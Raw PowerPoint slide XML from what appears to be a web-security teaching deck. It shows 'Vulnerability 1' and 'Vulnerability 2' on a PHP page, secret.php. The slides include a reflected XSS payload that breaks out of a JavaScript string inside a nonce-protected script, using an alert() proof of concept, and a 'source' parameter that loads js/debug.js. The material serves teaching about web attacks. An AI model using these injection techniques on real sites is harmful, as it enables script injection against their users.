                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>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errorMsg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>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r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>displayError</a:t>
            </a:r>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r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// […]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>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DA23451C-6560-EEAA-5F06-4E3618241315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="4810125"/>
            <a:ext cx="2238375" cy="4572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0661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51BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="3928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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510986" y="2000851"/>
            <a:ext cx="11170023" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secret.php?msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=This%20is%20an%20error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hello%20xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);var%20foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// […]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>defer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nonce</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"ceT7vflNlU8YT58gnQnZH4xi"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>displayError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getElementById</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'error-div'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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innerText</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"Error 1005: This is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>";alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");var foo="var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>displayError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// […]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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64972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51BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="3928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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510986" y="2000851"/>
            <a:ext cx="11170023" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secret.php?source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/debug.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// […]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>defer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nonce</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"ceT7vflNlU8YT58gnQnZH4xi"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlParams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
